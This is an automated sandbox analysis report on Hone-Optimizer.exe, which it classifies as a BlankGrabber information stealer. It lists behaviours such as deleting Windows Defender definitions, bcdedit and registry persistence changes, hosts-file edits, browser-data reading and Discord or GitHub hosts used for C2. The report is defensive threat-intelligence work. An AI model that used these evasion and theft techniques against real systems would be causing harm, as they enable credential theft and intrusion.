Malware Analysis Report

2024-12-07 10:00

Sample ID 241114-n2gqbssncp
Target Hone-Optimizer.exe
SHA256 07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
Tags
blankgrabber defense_evasion discovery evasion execution persistence ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

Threat Level: Known bad

The file Hone-Optimizer.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber defense_evasion discovery evasion execution persistence ransomware spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Deletes Windows Defender Definitions

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Active Setup

Event Triggered Execution: Image File Execution Options Injection

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Obfuscated Files or Information: Command Obfuscation

Power Settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Enumerates processes with tasklist

UPX packed file

Launches sc.exe

Hide Artifacts: Ignore Process Interrupts

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Time Discovery

Browser Information Discovery

Modifies registry class

Checks SCSI registry key(s)

Gathers network information

Detects videocard installed

Suspicious use of SetWindowsHookEx

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies registry key

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Modifies Internet Explorer settings

cURL User-Agent

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 11:53

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 11:53

Reported

2024-11-14 11:59

Platform

win10ltsc2021-20241023-en

Max time kernel

298s

Max time network

369s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "4" C:\Windows\system32\reg.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\rundll32.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\D: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\F: N/A N/A
File opened (read-only) \??\F: N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Windows\system32\Dism.exe N/A
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe N/A
File opened for modification C:\Windows\CbsTemp C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

System Time Discovery

discovery
Description Indicator Process Target
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A N/A N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A N/A N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
